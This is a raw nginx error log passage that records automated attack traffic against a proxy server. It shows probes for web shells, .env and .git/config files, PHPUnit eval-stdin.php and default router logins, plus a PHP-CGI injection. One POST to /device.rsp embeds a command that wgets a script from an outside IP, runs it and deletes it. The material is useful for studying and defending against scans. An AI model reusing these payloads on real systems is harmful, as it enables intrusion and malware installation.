222#222: *1710 open() "/var/www/html/wp-22.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /wp-22.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:59 [error] 222#222: *1710 open() "/var/www/html/byp9.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /byp9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:59 [error] 222#222: *1710 open() "/var/www/html/an8.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /an8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:59 [error] 222#222: *1710 open() "/var/www/html/co.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /co.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:59 [error] 222#222: *1710 open() "/var/www/html/fs8.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /fs8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:00 [error] 222#222: *1710 open() "/var/www/html/fs9.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /fs9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:00 [error] 222#222: *1710 open() "/var/www/html/fput.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /fput.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:00 [error] 222#222: *1710 open() "/var/www/html/PEAR5.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /PEAR5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:00 [error] 222#222: *1710 open() "/var/www/html/71.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /71.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:00 [error] 222#222: *1710 open() "/var/www/html/32next.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /32next.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:01 [error] 222#222: *1710 open() "/var/www/html/grab.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /grab.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:01 [error] 222#222: *1710 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:01 [error] 222#222: *1710 open() "/var/www/html/a89f2bb076.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /a89f2bb076.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:01 [error] 222#222: *1710 open() "/var/www/html/cf2c7ba7c9.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /cf2c7ba7c9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:02 [error] 222#222: *1710 open() "/var/www/html/9ad28be803.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /9ad28be803.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:02 [error] 222#222: *1710 open() "/var/www/html/9124d0b828.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /9124d0b828.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:02 [error] 222#222: *1710 open() "/var/www/html/4c01c0aad1.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /4c01c0aad1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:02 [error] 222#222: *1710 open() "/var/www/html/42fc020de1.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /42fc020de1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:02 [error] 222#222: *1710 open() "/var/www/html/3f1a74f9b9.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /3f1a74f9b9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:03 [error] 222#222: *1710 open() "/var/www/html/31df2a49f2.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /31df2a49f2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:03 [error] 222#222: *1710 open() "/var/www/html/1a68b583d7.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /1a68b583d7.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:17:03 [error] 222#222: *1710 open() "/var/www/html/1165819e0c.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /1165819e0c.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:24:28 [error] 222#222: *1714 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 00:01:49 [error] 222#222: *1769 open() "/var/www/html/sendgrid.env" failed (2: No such file or directory), client: 45.139.104.168, server: localhost-nginx-proxy-manager, request: "GET /sendgrid.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 00:10:14 [error] 222#222: *1771 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 00:48:57 [error] 223#223: *1784 open() "/var/www/html/version" failed (2: No such file or directory), client: 45.142.154.46, server: localhost-nginx-proxy-manager, request: "GET /version HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 00:48:58 [error] 223#223: *1787 open() "/var/www/html/v1" failed (2: No such file or directory), client: 45.142.154.46, server: localhost-nginx-proxy-manager, request: "GET /v1 HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 00:56:26 [error] 222#222: *3278 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 03:28:24 [error] 223#223: *4835 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 139.5.0.208, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" +2026/01/27 03:31:19 [error] 223#223: *4836 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 03:58:47 [error] 223#223: *4857 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 04:44:12 [error] 224#224: *4883 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 05:30:41 [error] 232#232: *4891 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 05:34:32 [error] 229#229: *4896 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/27 05:56:57 [error] 229#229: *4913 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 07:47:09 [error] 230#230: *4970 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 07:49:17 [error] 230#230: *4971 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 07:52:19 [error] 229#229: *6465 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 101.36.108.133, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.215.191" +2026/01/27 07:52:19 [error] 229#229: *6466 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 101.36.108.133, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.215.191" +2026/01/27 08:24:39 [error] 232#232: *8224 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 08:44:48 [error] 232#232: *8275 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.197.197, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.215.191" +2026/01/27 08:46:50 [error] 231#231: *9767 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.197.197, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.215.191" +2026/01/27 08:47:12 [error] 231#231: *9768 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "91.82.215.191" +2026/01/27 09:24:12 [error] 232#232: *9889 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 10:37:45 [error] 229#229: *10090 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 10:54:26 [error] 236#236: *10102 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 10:57:28 [error] 237#237: *10103 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 11:08:08 [error] 236#236: *10110 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:08 [error] 236#236: *10111 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:08 [error] 236#236: *10112 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:08 [error] 236#236: *10113 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:08 [error] 236#236: *10114 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:09 [error] 236#236: *10115 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:09 [error] 236#236: *10117 open() "/var/www/html/config.yaml" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /config.yaml HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:09 [error] 236#236: *10118 open() "/var/www/html/env.example" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /env.example HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:09 [error] 236#236: *10119 open() "/var/www/html/config.ini" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /config.ini HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:09 [error] 236#236: *10120 open() "/var/www/html/test1.php" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /test1.php HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:09 [error] 236#236: *10121 open() "/var/www/html/admin/infophp.php" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /admin/infophp.php HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:09 [error] 236#236: *10122 open() "/var/www/html/settings.inc.php" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /settings.inc.php HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:09 [error] 236#236: *10123 open() "/var/www/html/settings.cfg" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /settings.cfg HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:10 [error] 236#236: *10124 open() "/var/www/html/staging2/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /staging2/.env HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:10 [error] 236#236: *10125 open() "/var/www/html/robomongo.json" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /robomongo.json HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:11 [error] 239#239: *11613 open() "/var/www/html/settings.py" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /settings.py HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:11 [error] 239#239: *11614 open() "/var/www/html/Admin/test" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /Admin/test HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:11 [error] 239#239: *11615 open() "/var/www/html/v1/test" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /v1/test HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:11 [error] 239#239: *11616 open() "/var/www/html/en/test" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /en/test HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:11 [error] 239#239: *11617 open() "/var/www/html/st/test" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /st/test HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:08:11 [error] 239#239: *11618 open() "/var/www/html/Crm" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /Crm HTTP/1.1", host: "91.82.215.191" +2026/01/27 11:35:31 [error] 236#236: *11631 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 11:49:58 [error] 239#239: *13131 open() "/var/www/html/.env" failed (2: No such file or directory), client: 91.244.197.69, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/27 11:52:44 [error] 239#239: *13136 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 11:54:02 [error] 239#239: *13137 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 204.76.203.49, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3Bwget%20http:%2F%2F204.76.203.49%2Fd.sh%3Bchmod%20+x%20d.sh%3Bchmod%20777%20d.sh%3B.%2Fd.sh%20xp90%3Brm%20-f%20d.sh HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:18:44 [error] 239#239: *13147 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:18:50 [error] 239#239: *13147 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:18:52 [error] 239#239: *13147 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:18:55 [error] 239#239: *13147 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:18:58 [error] 239#239: *13147 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:01 [error] 239#239: *13147 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:03 [error] 239#239: *13147 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:06 [error] 239#239: *13147 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:08 [error] 239#239: *13147 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:10 [error] 239#239: *13147 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:12 [error] 239#239: *13147 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:14 [error] 239#239: *13147 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:16 [error] 239#239: *13147 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:19 [error] 239#239: *13147 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:21 [error] 239#239: *13147 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:24 [error] 239#239: *13147 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:27 [error] 239#239: *13147 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:29 [error] 239#239: *13147 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:32 [error] 239#239: *13147 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:35 [error] 239#239: *13147 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:38 [error] 239#239: *13147 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:41 [error] 239#239: *13147 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:44 [error] 239#239: *13147 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:47 [error] 239#239: *13147 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:49 [error] 239#239: *13147 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:52 [error] 239#239: *13147 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:54 [error] 239#239: *13147 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:19:57 [error] 239#239: *13147 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:00 [error] 239#239: *13147 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:03 [error] 239#239: *13147 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:06 [error] 239#239: *13147 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:09 [error] 239#239: *13147 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:11 [error] 239#239: *13147 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:14 [error] 239#239: *13147 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:16 [error] 239#239: *13147 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:18 [error] 239#239: *13147 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:21 [error] 239#239: *13147 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 182.136.25.73, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/27 12:20:24 [error] 